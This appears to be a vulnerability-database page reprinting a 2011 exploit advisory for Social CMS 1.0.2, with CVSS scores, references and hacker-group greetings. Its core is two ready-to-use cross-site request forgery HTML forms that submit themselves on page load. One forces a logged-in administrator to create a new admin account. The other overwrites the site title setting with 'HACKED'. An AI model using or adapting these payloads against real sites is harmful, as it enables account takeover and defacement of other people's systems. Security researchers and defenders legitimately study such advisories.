Social CMS 1.0.2 Multiple CSRF Vulnerabilities

2012.10.16
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!--- Title: socialcms1.0.2 Multiple CSRF Vulnerabilities Author: vir0e5 a.k.a banditc0de <vir0e5@yahoo.com> Date: Wed 20 april 2011 11:18:22 AM Vendor: www.socialcms.com Download: http://sourceforge.net/projects/socialcms/ ---> <!-- Create Admin User --> <body onload='document.csrf.submit()'> <form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_members.php?action=member_new&page=1&mID=1" class="form"> <p><input type="hidden" name="TR_login_name" value="vir0e5"></p> <p><input type="hidden" name="TR_firstname" value="bandit"></p> <p><input type="hidden" name="TR_lastname" value="c0de"/></p> <p><input type="hidden" name="TREF_email_address" value="vir0e5@hackermail.com"/></p> <p><input type="hidden" name="TR_group_level" value=""/></p> <input type="hidden" name="update" value="update" type="submit" /> </form> </body> <!-- Default site title --> <body onload='document.csrf.submit()'> <form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_configuration.php?gid=1&id=36&action=save" class="form"> <p><input type="hidden" name="TR_configuration_title" value="Default site title"></p> <p><input type="hidden" name="TR_configuration_name" value="CSRF VULN"></p> <p><input type="hidden" name="TR_configuration_value" value="HACKED"/></p> <p><input type="hidden" name="configuration_description" value="CSRF"/></p> <p><input type="hidden" name="IN_configuration_priority" value="0"/></p> <input type="hidden" name="update" value="update" type="submit" /> </form> ****************-------**DCI2k7**--------***************** [+] Greetings :[ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik |syafm0vic- skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ; [+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com | http://cyber4rt.com And OTHER's Cause i'm Alone!!

References:

http://cxsecurity.com/issue/WLB-2012040012
http://sourceforge.net/projects/socialcms/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top